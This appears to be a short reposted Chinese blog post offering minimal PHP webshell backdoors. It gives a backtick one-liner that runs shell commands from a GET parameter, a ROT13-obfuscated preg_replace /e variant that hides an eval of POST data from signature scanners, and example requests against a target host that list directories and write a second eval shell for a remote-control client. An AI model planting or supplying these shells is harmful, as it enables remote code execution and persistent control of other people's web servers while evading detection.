php最短一句话后门webshell

<?php
@`$_GET[c]`; //反引号执行
?>

preg_replace("//e",@str_rot13('@riny($_CBFG[p])'),"");  
//str_rot13('@riny($_CBFG[p])') == eval($_POST[c])
//字符串执行 ROT13 转换特征码,php version < 5.5.0 /e修饰符才可执行

调用示例:

#生成当前目录列表dir.txt
http://target_host/webshell.php?c=dir%20>dir.txt 

#生成菜刀可调用的POST Shell
http://target_host/webshell.php?c=echo%20"<?php @eval($_POST[c]);>" > newshell.php

来源：oschina

链接：https://my.oschina.net/u/1389147/blog/505171

标签

webshell

php

一句话

反引号后门

易学教程内所有资源均来自网络或用户发布的内容，如有违反法律规定的内容欢迎反馈！
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!